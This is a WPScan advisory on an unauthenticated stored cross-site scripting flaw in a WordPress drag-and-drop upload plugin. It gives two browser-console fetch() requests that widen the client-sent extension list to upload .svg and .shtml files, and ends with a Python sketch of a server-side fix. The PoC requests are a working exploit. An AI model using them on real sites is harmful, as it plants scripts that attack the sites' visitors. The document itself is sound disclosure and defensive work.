wpvulndb - Zeyad Alshahrani - WPVDB-ID: 3AC0853B-03F7-44B9-AA9B-72DF3E01A9B5
Sep 21, 2023 - 12:00 a.m.

Drag and Drop Multiple File Upload < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

wpscan.com
Tags: file upload, cross-site scripting, wordpress plugin

EPSS: 0.001 (percentile 20.8%)

Description

The plugin does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.

PoC

Using malicious SVG files:

Go to a product page that features the file upload form, and paste the following in your browser console:

fetch("/wp-admin/admin-ajax.php", {
  "credentials": "omit",
  "headers": {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
  },
  "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/product/catapult/",
  "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.svg\"\r\nContent-Type: image/jpeg\r\n\r\n\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
  "method": "POST",
  "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.svg

Using malicious SHTML files:

Go to a product page that features the file upload form, and paste the following in your browser console:

fetch("/wp-admin/admin-ajax.php", {
  "credentials": "omit",
  "headers": {
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
  },
  "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|shtml\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.shtml\"\r\nContent-Type: image/jpeg\r\n\r\n\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
  "method": "POST",
  "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.shtml
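As an added illustration, not the plugin's or WPScan's code, the Python below models the pattern the PoC relies on (the allowed-extension list arrives in the request's supported_type field) next to a server-side check that ignores the client list and refuses active-content extensions such as svg and shtml. The allowlist and denylist contents are assumptions for the example, not the plugin's real defaults.

```python
import os

# Extensions that browsers or web servers execute rather than merely store:
# the advisory names svg (inline script) and shtml (Apache server-side includes);
# the rest are added here as an assumed, defender-chosen denylist.
ACTIVE_CONTENT_EXTENSIONS = frozenset(
    {"svg", "shtml", "html", "htm", "xhtml", "php", "phtml", "js"}
)

# Assumed server-side allowlist: mirrors the safe part of the list seen in the
# PoC request, but lives in server code where the client cannot extend it.
SERVER_ALLOWLIST = frozenset(
    {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "xls", "xlsx", "stl", "mp4", "mp3", "zip"}
)


def _extension(filename: str) -> str:
    """Lower-cased text after the final dot of the basename, '' if there is none."""
    base = os.path.basename(filename.strip())
    ext = base.rsplit(".", 1)[1] if "." in base else ""
    return ext.lower()


def vulnerable_is_allowed(filename: str, client_supported_type: str) -> bool:
    """Model of the flawed pattern: the allowed extensions are taken from the
    request's supported_type field, so appending 'svg' or 'shtml' lets them through."""
    allowed = {e.strip().lower() for e in client_supported_type.split("|") if e.strip()}
    return _extension(filename) in allowed


def hardened_is_allowed(filename: str, client_supported_type: str = "") -> bool:
    """Server decides: the client list is accepted only for call compatibility and
    never consulted; the extension must be on the server allowlist and must not be
    an active-content type, whatever any list says."""
    ext = _extension(filename)
    if not ext or ext in ACTIVE_CONTENT_EXTENSIONS:
        return False
    return ext in SERVER_ALLOWLIST


if __name__ == "__main__":
    # Constructed sample: the client list from the PoC with 'svg' appended.
    attacker_list = "jpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg"
    for name in ("photo.jpg", "xss.svg", "xss.shtml", "XSS.SVG", "archive.zip", "noext"):
        print(f"{name:12} vulnerable={vulnerable_is_allowed(name, attacker_list)} "
              f"hardened={hardened_is_allowed(name, attacker_list)}")
```

Extension checks alone do not make stored SVG safe to view inline; serving the upload directory with a restrictive Content-Type or Content-Disposition: attachment is the complementary mitigation.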
